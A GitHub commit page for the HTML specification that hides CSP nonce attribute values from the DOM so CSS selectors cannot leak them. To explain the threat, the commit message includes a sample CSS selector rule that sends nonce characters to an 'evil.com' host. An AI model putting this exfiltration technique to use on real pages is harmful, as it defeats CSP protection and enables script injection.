Permalink
Browse files

Hide nonce content attribute values

Some [recent attacks on CSP][1] rely on the ability to exfiltrate
nonce data via various mechanisms that can read content attributes.
CSS selectors are the best example: through clever use of
prefix/postfix text matching selectors values can be sent out to an
attacker's server for reuse (e.g.,
`script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch mitigates the risk of this class of attack by hiding the
nonce value from elements' content attributes by moving the `nonce`
attributes into a new `NoncedElement` interface mixin, which is
included into `HTMLElement`. That mixin defines the following
behaviors for the `nonce` content attribute:

1.  When the `nonce` content attribute is set or changed, its new
    value is copied into a `[[CryptographicNonce]]` slot on the
    element.

2.  When a `NoncedElement` is inserted into a document which was
    delivered with a `Content-Security-Policy` header, the `nonce`
    content attribute is cleared out.

The `nonce` IDL attribute getter and setter now operate on the
`[[CryptographicNonce]]` slot's value rather than reflecting the
content attribute, meaning that the nonce value remains exposed
to script, but is opaque to non-script side-channels.

Likewise, the `[[CryptographicNonce]]` slot's value is used when
populating a request's cryptographic nonce metadata in order to
deliver the nonce to CSP for validation.

Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding

Closes #2369.

[1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
  • Loading branch information...
mikewest authored and annevk committed Nov 22, 2017
1 parent 52d09c9 commit 19f5cce801550d278b9459f8c4797f9f86aae864
Showing with 97 additions and 56 deletions.
  1. +97 −56 source
Oops, something went wrong.

0 comments on commit 19f5cce

Please sign in to comment.